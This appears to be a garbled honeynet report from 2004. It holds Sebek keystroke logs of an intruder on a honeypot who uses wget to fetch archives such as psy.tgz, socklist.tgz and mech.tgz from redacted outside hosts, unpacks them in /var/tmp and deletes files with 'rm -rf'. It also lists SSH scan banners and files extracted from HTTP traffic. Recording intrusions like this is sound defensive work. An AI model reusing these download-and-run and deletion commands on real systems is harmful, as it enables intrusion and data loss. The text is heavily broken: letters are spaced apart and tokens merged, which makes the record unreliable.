2 [ 2 0 0 4 0 8 0 21 9 : 3 0 : 3 4 [ 2 0 0 4 0 8 0 21 9 : 3 0 : 3 6 [ 2 0 0 4 0 8 0 21 9 : 3 0 : 3 8 [ 2 0 0 4 0 8 0 21 9 : 3 0 : 4 6 [ 2 0 0 4 0 8 0 21 9 : 3 0 : 4 7

1 0 . 2 . 1 . 1 4 62 6 9 9 4b a s h0 ] w g e t r c i t 1 0 . 2 . 1 . 1 4 62 6 9 9 4b a s h0 ] t a r c d. l s 1 0 . 2 . 1 . 1 4 62 6 9 9 4b a s h0 ] p i c op s y b c 1 0 . 2 . 1 . 1 4 62 6 9 9 4b a s h0 ] w g e t d x . 1 0 . 2 . 1 . 1 4 62 6 9 9 4b a s h0 ] w g e tX X X / p i c o g 1 0 . 2 . 1 . 1 4 62 6 9 9 4b a s h0 ] c d s[ B S ] [ B S ]. . 1 0 . 2 . 1 . 1 4 62 6 9 9 4b a s h0 ] w g e t r o e g 1 0 . 2 . 1 . 1 4 62 6 9 9 4b a s h0 ] t a rv t 1 0 . 2 . 1 . 1 4 62 6 9 9 4b a s h0 ] m vp/ 1 0 . 2 . 1 . 1 4 62 6 9 9 4b a s h0 ] l s 1 0 . 2 . 1 . 1 4 62 6 9 9 4b a s h0 ] c d 1 0 . 2 . 1 . 1 4 62 6 9 9 4b a s h0 ] l s 1 0 . 2 . 1 . 1 4 62 6 9 9 4b a s h0 ] p i c o a r 1 0 . 2 . 1 . 1 4 62 6 9 9 4b a s h0 ] w [ B S ] c d/ v a r / t m p 1 0 . 2 . 1 . 1 4 62 6 9 9 4b a s h0 ] l s 1 0 . 2 . 1 . 1 4 62 6 9 9 4b a s h0 ] c [ B S ] w w [ B S ] g e tX X X [ B S ] . c o m / A r h v [ B S ] i v e / \ [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] [ B S ] h i v e / s o c k l i s t . t g z 1 0 . 2 . 1 . 1 4 62 6 9 9 4b a s h0 ] t a rv 1 0 . 2 . 1 . 1 4 62 6 9 9 4b a s h0 ] t a rf s o c k . 1 0 . 2 . 1 . 1 4 62 6 9 9 4b a s h0 ] m vs l r 1 0 . 2 . 1 . 1 4 62 6 9 9 4b a s h0 ] s o c k l i s t 1 0 . 2 . 1 . 1 4 62 6 9 9 4b a s h0 ] p sn x [ B S ] [ B S ] a x 1 0 . 2 . 1 . 1 4 62 6 9 9 4b a s h0 ] w g e t . v t 1 0 . 2 . 1 . 1 4 62 6 9 9 0s e n d m a i l0 ] . l s p i c o c d. l s c d l s w c d/ v a r / t m p l s c w w g e tX X X / . c o m / A r h v i v e / \ h i v e / s o c k l i s t . t g z s o c k l i s t p sn x a x 1 0 . 2 . 1 . 1 4 62 6 9 9 4b a s h0 ] t a rm c de . / m e c d. . 1 0 . 2 . 1 . 1 4 62 6 9 9 4b a s h0 ] l s 1 0 . 2 . 1 . 1 4 62 6 9 9 4b a s h0 ] r mr f* z 1 0 . 2 . 1 . 1 4 62 6 9 9 4b a s h0 ] r mr fp 1 0 . 2 . 1 . 1 4 62 6 9 9 4b a s h0 ] r mr fp . c 1 0 . 2 . 1 . 1 4 62 6 9 9 4b a s h0 ] r mr fs t o [ B S ] [ B S ] s l s t o p 1 0 . 2 . 1 . 1 4 62 6 9 9 4b a s h0 ] l s

P o t :1 0 . 2 . 1 . 1 4 7[1 8S e b e kr e c o r d s] [ 2 0 0 4 0 8 0 21 5 : 2 2 : 1 5 [ 2 0 0 4 0 8 0 21 5 : 2 2 : 1 6 [ 2 0 0 4 0 8 0 21 5 : 2 2 : 1 8 [ 2 0 0 4 0 8 0 21 5 : 2 2 : 1 9 [ 2 0 0 4 0 8 0 21 5 : 2 2 : 2 1 [ 2 0 0 4 0 8 0 21 5 : 2 2 : 2 2 [ 2 0 0 4 0 8 0 21 5 : 2 2 : 2 4 [ 2 0 0 4 0 8 0 21 5 : 2 2 : 2 5 [ 2 0 0 4 0 8 0 21 5 : 2 2 : 2 7 1 0 . 2 . 1 . 1 4 75 0 3 9s s h d0 ] S S H 2 . 0 l i b s s h 0 . 1 1 0 . 2 . 1 . 1 4 75 0 4 0s s h d0 ] S S H 2 . 0 l i b s s h 0 . 1 1 0 . 2 . 1 . 1 4 75 0 4 1s s h d0 ] S S H 2 . 0 l i b s s h 0 . 1 1 0 . 2 . 1 . 1 4 75 0 4 2s s h d0 ] S S H 2 . 0 l i b s s h 0 . 1 1 0 . 2 . 1 . 1 4 75 0 4 3s s h d0 ] S S H 2 . 0 l i b s s h 0 . 1 1 0 . 2 . 1 . 1 4 75 0 4 4s s h d0 ] S S H 2 . 0 l i b s s h 0 . 1 1 0 . 2 . 1 . 1 4 75 0 4 5s s h d0 ] S S H 2 . 0 l i b s s h 0 . 1 1 0 . 2 . 1 . 1 4 75 0 4 6s s h d0 ] S S H 2 . 0 l i b s s h 0 . 1 1 0 . 2 . 1 . 1 4 75 0 4 7s s h d0 ] S S H 2 . 0 l i b s s h 0 . 1

R e a s s e m b l i n gi n t e r e s t i n gT C Ps t r e a m s( 2 0 0 4 0 8 0 2 ) : P o t :1 0 . 2 . 1 . 1 4 5[6i n t e r e s t i n gT C Ps t r e a m s] P o t :1 0 . 2 . 1 . 1 4 6[3 2i n t e r e s t i n gT C Ps t r e a m s] P o t :1 0 . 2 . 1 . 1 4 7[5i n t e r e s t i n gT C Ps t r e a m s] E x t r a c t e df i l e sd o w n l o a d e db yH T T P( 2 0 0 4 0 8 0 2 ) : / t m p / o u t p u t / 2 0 0 4 0 8 0 2 / 1 0 . 2 . 1 . 1 4 6 / e x t r a c t e d _ f i l e s / 2 1 3 . 2 1 8 . X X X . X X X / s e s s i o n _ 2 6 1 9 / p . t a r . g z / t m p / o u t p u t / 2 0 0 4 0 8 0 2 / 1 0 . 2 . 1 . 1 4 6 / e x t r a c t e d _ f i l e s / 2 1 3 . 2 1 8 . X X X . X X X / s e s s i o n _ 2 6 7 3 / p s y . t g z / t m p / o u t p u t / 2 0 0 4 0 8 0 2 / 1 0 . 2 . 1 . 1 4 6 / e x t r a c t e d _ f i l e s / 2 1 3 . 2 1 8 . X X X . X X X / s e s s i o n _ 2 7 2 3 / p i c o . t g z / t m p / o u t p u t / 2 0 0 4 0 8 0 2 / 1 0 . 2 . 1 . 1 4 6 / e x t r a c t e d _ f i l e s / 2 1 3 . 2 1 8 . X X X . X X X / s e s s i o n _ 4 3 8 4 / s o c k l i s t . t g z / t m p / o u t p u t / 2 0 0 4 0 8 0 2 / 1 0 . 2 . 1 . 1 4 6 / e x t r a c t e d _ f i l e s / 6 6 . 2 1 8 . X X X . X X X / s e s s i o n _ 2 6 7 0 / s s l s t o p . t a r . g z / t m p / o u t p u t / 2 0 0 4 0 8 0 2 / 1 0 . 2 . 1 . 1 4 6 / e x t r a c t e d _ f i l e s / 2 1 3 . 2 1 8 . X X X . X X X / s e s s i o n _ 4 4 4 0 / m e c h . t g z E x t r a c t e df i l e sd o w n l o a d e db yF T P( 2 0 0 4 0 8 0 2 ) : < n o n e > = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =